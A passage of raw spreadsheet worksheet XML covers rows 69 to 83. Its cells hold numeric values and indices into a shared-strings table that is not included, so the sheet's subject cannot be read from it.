        <v>509</v>
      </c>
      <c r="J69" s="44" t="s">
        <v>510</v>
      </c>
      <c r="K69" s="45">
        <v>402.0</v>
      </c>
      <c r="L69" s="45">
        <v>1.0</v>
      </c>
      <c r="M69" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N69" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O69" s="47">
        <v>402.0</v>
      </c>
      <c r="P69" s="47">
        <v>1.0</v>
      </c>
      <c r="Q69" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R69" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S69" s="48">
        <v>402.0</v>
      </c>
      <c r="T69" s="48">
        <v>1.0</v>
      </c>
      <c r="U69" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V69" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W69" s="49" t="s">
        <v>511</v>
      </c>
      <c r="X69" s="49">
        <v>4.0</v>
      </c>
      <c r="Y69" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z69" s="46" t="s">
        <v>512</v>
      </c>
      <c r="AA69" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB69" s="62" t="s">
        <v>513</v>
      </c>
      <c r="AC69" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD69" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE69" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF69" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG69" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="70" ht="153.75" customHeight="1">
      <c r="B70" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C70" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D70" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E70" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F70" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G70" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H70" s="44" t="s">
        <v>508</v>
      </c>
      <c r="I70" s="44" t="s">
        <v>509</v>
      </c>
      <c r="J70" s="44" t="s">
        <v>514</v>
      </c>
      <c r="K70" s="45">
        <v>402.0</v>
      </c>
      <c r="L70" s="45">
        <v>1.0</v>
      </c>
      <c r="M70" s="45">
        <v>15.0</v>
      </c>
      <c r="N70" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O70" s="47">
        <v>402.0</v>
      </c>
      <c r="P70" s="47">
        <v>1.0</v>
      </c>
      <c r="Q70" s="47">
        <v>15.0</v>
      </c>
      <c r="R70" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S70" s="48">
        <v>402.0</v>
      </c>
      <c r="T70" s="48">
        <v>1.0</v>
      </c>
      <c r="U70" s="48">
        <v>30.0</v>
      </c>
      <c r="V70" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W70" s="49" t="s">
        <v>515</v>
      </c>
      <c r="X70" s="49">
        <v>5.0</v>
      </c>
      <c r="Y70" s="49">
        <v>60221.0</v>
      </c>
      <c r="Z70" s="46">
        <v>2002749.2002752</v>
      </c>
      <c r="AA70" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB70" s="62" t="s">
        <v>513</v>
      </c>
      <c r="AC70" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD70" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE70" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF70" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG70" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="71" ht="153.75" customHeight="1">
      <c r="B71" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C71" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D71" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E71" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F71" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G71" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H71" s="44" t="s">
        <v>516</v>
      </c>
      <c r="I71" s="44" t="s">
        <v>509</v>
      </c>
      <c r="J71" s="44" t="s">
        <v>517</v>
      </c>
      <c r="K71" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L71" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M71" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N71" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O71" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P71" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q71" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R71" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S71" s="48" t="s">
        <v>307</v>
      </c>
      <c r="T71" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U71" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V71" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W71" s="49" t="s">
        <v>298</v>
      </c>
      <c r="X71" s="49">
        <v>2.0</v>
      </c>
      <c r="Y71" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z71" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA71" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB71" s="62" t="s">
        <v>518</v>
      </c>
      <c r="AC71" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD71" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE71" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF71" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG71" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="72" ht="153.75" customHeight="1">
      <c r="B72" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C72" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D72" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E72" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F72" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G72" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H72" s="44" t="s">
        <v>519</v>
      </c>
      <c r="I72" s="44" t="s">
        <v>509</v>
      </c>
      <c r="J72" s="44" t="s">
        <v>520</v>
      </c>
      <c r="K72" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L72" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M72" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N72" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O72" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P72" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q72" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R72" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S72" s="48">
        <v>50447.0</v>
      </c>
      <c r="T72" s="48">
        <v>1.0</v>
      </c>
      <c r="U72" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V72" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W72" s="49" t="s">
        <v>521</v>
      </c>
      <c r="X72" s="49">
        <v>3.0</v>
      </c>
      <c r="Y72" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z72" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA72" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB72" s="62" t="s">
        <v>522</v>
      </c>
      <c r="AC72" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD72" s="44" t="s">
        <v>152</v>
      </c>
      <c r="AE72" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF72" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG72" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="73" ht="153.75" customHeight="1">
      <c r="B73" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C73" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D73" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E73" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F73" s="52" t="s">
        <v>500</v>
      </c>
      <c r="G73" s="43" t="s">
        <v>501</v>
      </c>
      <c r="H73" s="44" t="s">
        <v>508</v>
      </c>
      <c r="I73" s="44" t="s">
        <v>523</v>
      </c>
      <c r="J73" s="44" t="s">
        <v>524</v>
      </c>
      <c r="K73" s="45">
        <v>402.0</v>
      </c>
      <c r="L73" s="45">
        <v>1.0</v>
      </c>
      <c r="M73" s="45">
        <v>15.0</v>
      </c>
      <c r="N73" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O73" s="47">
        <v>402.0</v>
      </c>
      <c r="P73" s="47">
        <v>1.0</v>
      </c>
      <c r="Q73" s="47">
        <v>15.0</v>
      </c>
      <c r="R73" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S73" s="48">
        <v>402.0</v>
      </c>
      <c r="T73" s="48">
        <v>1.0</v>
      </c>
      <c r="U73" s="48">
        <v>30.0</v>
      </c>
      <c r="V73" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W73" s="49" t="s">
        <v>525</v>
      </c>
      <c r="X73" s="49">
        <v>5.0</v>
      </c>
      <c r="Y73" s="49">
        <v>60221.0</v>
      </c>
      <c r="Z73" s="46" t="s">
        <v>526</v>
      </c>
      <c r="AA73" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB73" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC73" s="62" t="s">
        <v>527</v>
      </c>
      <c r="AD73" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE73" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF73" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG73" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="74" ht="153.75" customHeight="1">
      <c r="B74" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C74" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D74" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E74" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F74" s="52" t="s">
        <v>528</v>
      </c>
      <c r="G74" s="43" t="s">
        <v>529</v>
      </c>
      <c r="H74" s="44" t="s">
        <v>530</v>
      </c>
      <c r="I74" s="44" t="s">
        <v>531</v>
      </c>
      <c r="J74" s="44" t="s">
        <v>532</v>
      </c>
      <c r="K74" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L74" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M74" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N74" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O74" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P74" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q74" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R74" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U74" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V74" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W74" s="49" t="s">
        <v>533</v>
      </c>
      <c r="X74" s="49">
        <v>4.0</v>
      </c>
      <c r="Y74" s="49">
        <v>698.0</v>
      </c>
      <c r="Z74" s="46" t="s">
        <v>526</v>
      </c>
      <c r="AA74" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB74" s="62" t="s">
        <v>534</v>
      </c>
      <c r="AC74" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD74" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE74" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF74" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG74" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="75" ht="153.75" customHeight="1">
      <c r="B75" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C75" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D75" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E75" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F75" s="52" t="s">
        <v>528</v>
      </c>
      <c r="G75" s="43" t="s">
        <v>529</v>
      </c>
      <c r="H75" s="44" t="s">
        <v>535</v>
      </c>
      <c r="I75" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J75" s="44" t="s">
        <v>536</v>
      </c>
      <c r="K75" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L75" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M75" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N75" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O75" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P75" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q75" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R75" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U75" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V75" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W75" s="49" t="s">
        <v>537</v>
      </c>
      <c r="X75" s="49">
        <v>3.0</v>
      </c>
      <c r="Y75" s="49">
        <v>16.0</v>
      </c>
      <c r="Z75" s="46" t="s">
        <v>526</v>
      </c>
      <c r="AA75" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB75" s="62" t="s">
        <v>538</v>
      </c>
      <c r="AC75" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD75" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE75" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF75" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG75" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="76" ht="153.75" customHeight="1">
      <c r="B76" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C76" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D76" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E76" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F76" s="52" t="s">
        <v>528</v>
      </c>
      <c r="G76" s="43" t="s">
        <v>529</v>
      </c>
      <c r="H76" s="44" t="s">
        <v>539</v>
      </c>
      <c r="I76" s="44" t="s">
        <v>460</v>
      </c>
      <c r="J76" s="44" t="s">
        <v>540</v>
      </c>
      <c r="K76" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L76" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M76" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N76" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O76" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P76" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q76" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R76" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U76" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V76" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W76" s="49" t="s">
        <v>541</v>
      </c>
      <c r="X76" s="49">
        <v>5.0</v>
      </c>
      <c r="Y76" s="49">
        <v>1007.0</v>
      </c>
      <c r="Z76" s="46" t="s">
        <v>542</v>
      </c>
      <c r="AA76" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB76" s="62" t="s">
        <v>543</v>
      </c>
      <c r="AC76" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD76" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE76" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF76" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG76" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="77" ht="153.75" customHeight="1">
      <c r="B77" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C77" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D77" s="43" t="s">
        <v>498</v>
      </c>
      <c r="E77" s="43" t="s">
        <v>499</v>
      </c>
      <c r="F77" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G77" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H77" s="44" t="s">
        <v>544</v>
      </c>
      <c r="I77" s="44" t="s">
        <v>366</v>
      </c>
      <c r="J77" s="44" t="s">
        <v>545</v>
      </c>
      <c r="K77" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L77" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M77" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N77" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O77" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P77" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q77" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R77" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U77" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V77" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="X77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y77" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Z77" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AA77" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB77" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC77" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD77" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE77" s="50" t="s">
        <v>313</v>
      </c>
      <c r="AF77" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG77" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="78" ht="153.75" customHeight="1">
      <c r="B78" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C78" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D78" s="43" t="s">
        <v>546</v>
      </c>
      <c r="E78" s="43" t="s">
        <v>547</v>
      </c>
      <c r="F78" s="43" t="s">
        <v>10</v>
      </c>
      <c r="G78" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H78" s="44" t="s">
        <v>548</v>
      </c>
      <c r="I78" s="44" t="s">
        <v>549</v>
      </c>
      <c r="J78" s="44" t="s">
        <v>550</v>
      </c>
      <c r="K78" s="45">
        <v>254.0</v>
      </c>
      <c r="L78" s="45">
        <v>1.0</v>
      </c>
      <c r="M78" s="45">
        <v>2.0</v>
      </c>
      <c r="N78" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O78" s="47">
        <v>254.0</v>
      </c>
      <c r="P78" s="47">
        <v>1.0</v>
      </c>
      <c r="Q78" s="47">
        <v>2.0</v>
      </c>
      <c r="R78" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S78" s="48">
        <v>254.0</v>
      </c>
      <c r="T78" s="48">
        <v>1.0</v>
      </c>
      <c r="U78" s="48">
        <v>4.0</v>
      </c>
      <c r="V78" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W78" s="49" t="s">
        <v>551</v>
      </c>
      <c r="X78" s="49">
        <v>3.0</v>
      </c>
      <c r="Y78" s="49">
        <v>10.0</v>
      </c>
      <c r="Z78" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA78" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB78" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AC78" s="62" t="s">
        <v>552</v>
      </c>
      <c r="AD78" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE78" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF78" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG78" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="79" ht="153.75" customHeight="1">
      <c r="B79" s="42" t="s">
        <v>427</v>
      </c>
      <c r="C79" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D79" s="43" t="s">
        <v>553</v>
      </c>
      <c r="E79" s="43" t="s">
        <v>554</v>
      </c>
      <c r="F79" s="52" t="s">
        <v>555</v>
      </c>
      <c r="G79" s="43" t="s">
        <v>556</v>
      </c>
      <c r="H79" s="44" t="s">
        <v>557</v>
      </c>
      <c r="I79" s="44" t="s">
        <v>423</v>
      </c>
      <c r="J79" s="44" t="s">
        <v>558</v>
      </c>
      <c r="K79" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L79" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M79" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N79" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O79" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P79" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q79" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R79" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U79" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V79" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W79" s="49" t="s">
        <v>75</v>
      </c>
      <c r="X79" s="49">
        <v>2.0</v>
      </c>
      <c r="Y79" s="49">
        <v>2.0</v>
      </c>
      <c r="Z79" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA79" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB79" s="62" t="s">
        <v>559</v>
      </c>
      <c r="AC79" s="98" t="s">
        <v>557</v>
      </c>
      <c r="AD79" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE79" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF79" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG79" s="99" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="80" ht="153.75" customHeight="1">
      <c r="B80" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C80" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D80" s="43" t="s">
        <v>560</v>
      </c>
      <c r="E80" s="43" t="s">
        <v>561</v>
      </c>
      <c r="F80" s="52" t="s">
        <v>562</v>
      </c>
      <c r="G80" s="43" t="s">
        <v>563</v>
      </c>
      <c r="H80" s="44" t="s">
        <v>564</v>
      </c>
      <c r="I80" s="44" t="s">
        <v>565</v>
      </c>
      <c r="J80" s="44" t="s">
        <v>566</v>
      </c>
      <c r="K80" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L80" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M80" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N80" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O80" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P80" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q80" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R80" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U80" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V80" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W80" s="49" t="s">
        <v>222</v>
      </c>
      <c r="X80" s="49">
        <v>3.0</v>
      </c>
      <c r="Y80" s="49">
        <v>7.0</v>
      </c>
      <c r="Z80" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA80" s="61" t="s">
        <v>54</v>
      </c>
      <c r="AB80" s="62" t="s">
        <v>567</v>
      </c>
      <c r="AC80" s="62" t="s">
        <v>568</v>
      </c>
      <c r="AD80" s="62" t="s">
        <v>136</v>
      </c>
      <c r="AE80" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF80" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG80" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="81" ht="153.75" customHeight="1">
      <c r="B81" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C81" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D81" s="43" t="s">
        <v>569</v>
      </c>
      <c r="E81" s="43" t="s">
        <v>570</v>
      </c>
      <c r="F81" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G81" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H81" s="44" t="s">
        <v>571</v>
      </c>
      <c r="I81" s="44" t="s">
        <v>572</v>
      </c>
      <c r="J81" s="44" t="s">
        <v>573</v>
      </c>
      <c r="K81" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L81" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M81" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N81" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O81" s="100" t="s">
        <v>574</v>
      </c>
      <c r="P81" s="47">
        <v>2.0</v>
      </c>
      <c r="Q81" s="47">
        <v>2.0</v>
      </c>
      <c r="R81" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S81" s="101" t="s">
        <v>574</v>
      </c>
      <c r="T81" s="48">
        <v>2.0</v>
      </c>
      <c r="U81" s="48">
        <v>2.0</v>
      </c>
      <c r="V81" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W81" s="49" t="s">
        <v>575</v>
      </c>
      <c r="X81" s="49">
        <v>4.0</v>
      </c>
      <c r="Y81" s="49">
        <v>4.0</v>
      </c>
      <c r="Z81" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA81" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB81" s="62" t="s">
        <v>576</v>
      </c>
      <c r="AC81" s="62" t="s">
        <v>568</v>
      </c>
      <c r="AD81" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE81" s="50" t="s">
        <v>577</v>
      </c>
      <c r="AF81" s="50" t="s">
        <v>578</v>
      </c>
      <c r="AG81" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="82" ht="197.25" customHeight="1">
      <c r="B82" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C82" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D82" s="43" t="s">
        <v>579</v>
      </c>
      <c r="E82" s="43" t="s">
        <v>580</v>
      </c>
      <c r="F82" s="52" t="s">
        <v>10</v>
      </c>
      <c r="G82" s="43" t="s">
        <v>10</v>
      </c>
      <c r="H82" s="44" t="s">
        <v>581</v>
      </c>
      <c r="I82" s="44" t="s">
        <v>582</v>
      </c>
      <c r="J82" s="44" t="s">
        <v>583</v>
      </c>
      <c r="K82" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L82" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M82" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N82" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O82" s="56" t="s">
        <v>584</v>
      </c>
      <c r="P82" s="47">
        <v>3.0</v>
      </c>
      <c r="Q82" s="47">
        <v>12.0</v>
      </c>
      <c r="R82" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S82" s="48" t="s">
        <v>585</v>
      </c>
      <c r="T82" s="48">
        <v>4.0</v>
      </c>
      <c r="U82" s="48">
        <v>13.0</v>
      </c>
      <c r="V82" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W82" s="49" t="s">
        <v>586</v>
      </c>
      <c r="X82" s="49">
        <v>9.0</v>
      </c>
      <c r="Y82" s="49">
        <v>38.0</v>
      </c>
      <c r="Z82" s="46" t="s">
        <v>587</v>
      </c>
      <c r="AA82" s="61" t="s">
        <v>238</v>
      </c>
      <c r="AB82" s="62" t="s">
        <v>588</v>
      </c>
      <c r="AC82" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD82" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE82" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF82" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG82" s="63" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="83" ht="177.75" customHeight="1">
      <c r="B83" s="42" t="s">
        <v>215</v>
      </c>
      <c r="C83" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D83" s="43" t="s">
        <v>589</v>
      </c>
      <c r="E83" s="43" t="s">
        <v>590</v>
      </c>
      <c r="F83" s="52" t="s">
        <v>591</v>
      </c>
      <c r="G83" s="43" t="s">
        <v>592</v>
      </c>
      <c r="H83" s="44" t="s">
        <v>593</v>
      </c>
      <c r="I83" s="44" t="s">
        <v>594</v>
      </c>
      <c r="J83" s="44" t="s">
        <v>595</v>
      </c>
      <c r="K83" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L83" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M83" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N83" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O83" s="100" t="s">
        <v>574</v>
      </c>
      <c r="P83" s="47">
        <v>2.0</v>
      </c>
      <c r="Q83" s="47">
        <v>2.0</v>
      </c>
      <c r="R83" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S83" s="101" t="s">
        <v>574</v>
      </c>
      <c r="T83" s="48">
        <v>2.0</v>
      </c>
      <c r="U83" s="48">
        <v>2.0</v>
      </c>
      <c r="V83" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W83" s="49" t="s">
        <v>596</v>
      </c>
      <c r="X83" s="49">
        <v>5.0</v>
      </c>
      <c r="Y83" s="49">
        <v>6.0</v>
      </c>
      <c r="Z83" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA83" s="61" t="s">
        <v>58</v>
      </c>
      <c r="AB83" s="62" t="s">
        <v>597</v>
      </c>
      <c r="AC83" s="62" t="s">
        <v>10</v>
      </c>
      <c r="AD83" s="62" t="s">
        <v>106</v>
      </c>
      <c r="AE83" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF83" s="50" t="s">
        <v>598</v>
